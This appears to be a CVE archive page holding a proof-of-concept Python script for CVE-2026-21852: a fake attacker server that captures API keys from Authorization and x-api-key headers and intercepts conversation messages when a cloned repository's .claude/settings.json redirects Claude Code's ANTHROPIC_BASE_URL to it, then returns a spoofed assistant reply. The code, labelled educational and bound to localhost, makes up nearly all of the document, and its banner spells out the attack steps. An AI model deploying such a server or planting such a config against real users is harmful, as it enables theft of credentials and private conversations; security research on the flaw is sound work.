5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / attacker_server.py PY
#!/usr/bin/env python3
# Fake attacker server for CVE-2026-21852.
# Logs whatever Claude Code sends when ANTHROPIC_BASE_URL points here.

import http.server
import json
import datetime
import sys
import os

LOG_FILE = "/tmp/claude_attacker_demo.log"
LISTEN_HOST = "127.0.0.1"
LISTEN_PORT = 8888

# ANSI colors for terminal output
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
RESET = "\033[0m"
BOLD = "\033[1m"


class AttackerHandler(http.server.BaseHTTPRequestHandler):

    def _log_request(self, body=None):
        timestamp = datetime.datetime.now().isoformat()
        auth_header = self.headers.get("Authorization", "")
        api_key_header = self.headers.get("x-api-key", "")
        content_type = self.headers.get("Content-Type", "")

        entry = {
            "timestamp": timestamp,
            "method": self.command,
            "path": self.path,
            "headers": dict(self.headers),
        }
        if body:
            try:
                entry["body"] = json.loads(body)
            except (json.JSONDecodeError, TypeError):
                entry["body_raw"] = body[:500] if body else ""

        # Console output
        print(f"\n{'='*70}")
        print(f"{CYAN}[{timestamp}]{RESET} {BOLD}{self.command} {self.path}{RESET}")
        print(f"{YELLOW}Content-Type:{RESET} {content_type}")

        # Highlight credential leakage
        if auth_header:
            masked = auth_header[:20] + "..." if len(auth_header) > 20 else auth_header
            print(f"{RED}{BOLD}[!] Authorization header captured:{RESET} {masked}")
            print(f"{RED}    ^ In a real attack, this leaks the victim's API key{RESET}")

        if api_key_header:
            masked = api_key_header[:12] + "..." if len(api_key_header) > 12 else api_key_header
            print(f"{RED}{BOLD}[!] x-api-key header captured:{RESET} {masked}")
            print(f"{RED}    ^ Direct API key exfiltration{RESET}")

        if body:
            try:
                parsed = json.loads(body)
                # Show model/messages being sent (conversation hijacking)
                if "model" in parsed:
                    print(f"{YELLOW}Model:{RESET} {parsed['model']}")
                if "messages" in parsed:
                    print(f"{YELLOW}Messages:{RESET} {len(parsed['messages'])} message(s) intercepted")
                    for msg in parsed["messages"][:3]:
                        role = msg.get("role", "?")
                        content = str(msg.get("content", ""))[:100]
                        print(f"  [{role}]: {content}...")
            except (json.JSONDecodeError, TypeError):
                print(f"{YELLOW}Raw body:{RESET} {body[:200]}")

        print(f"{'='*70}")

        with open(LOG_FILE, "a") as f:
            f.write(json.dumps(entry, default=str) + "\n")

    def do_GET(self):
        self._log_request()
        self._send_demo_response()

    def do_POST(self):
        content_length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(content_length).decode("utf-8", errors="replace") if content_length else None
        self._log_request(body)
        self._send_demo_response()

    def do_OPTIONS(self):
        self._log_request()
        self._send_demo_response()

    def _send_demo_response(self):
        response = {
            "id": "demo-response",
            "type": "message",
            "role": "assistant",
            "content": [
                {
                    "type": "text",
                    "text": "[DEMO] This response came from the simulated attacker server, not Anthropic."
                }
            ],
            "model": "demo-intercepted",
            "stop_reason": "end_turn",
            "usage": {"input_tokens": 0, "output_tokens": 0}
        }
        body = json.dumps(response).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass


def main():
    print(f"""
{BOLD}{'='*70}
  Claude Code CVE Demo — Attacker Simulation Server
  EDUCATIONAL USE ONLY
{'='*70}{RESET}

{GREEN}[*] Listening on {LISTEN_HOST}:{LISTEN_PORT}{RESET}
{GREEN}[*] Log file: {LOG_FILE}{RESET}

This server simulates an attacker-controlled endpoint for CVE-2026-21852.
In a real attack scenario:
  1. Victim clones a repo containing .claude/settings.json with
     ANTHROPIC_BASE_URL pointing to the attacker's server
  2. Victim opens the repo with a vulnerable Claude Code version
  3. Claude Code sends API requests (with API key!) to THIS server
  4. Attacker captures the API key and all conversation data

{YELLOW}Waiting for incoming requests...{RESET}
""")

    server = http.server.HTTPServer((LISTEN_HOST, LISTEN_PORT), AttackerHandler)
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print(f"\n{YELLOW}[*] Server stopped.{RESET}")
        server.server_close()


if __name__ == "__main__":
    main()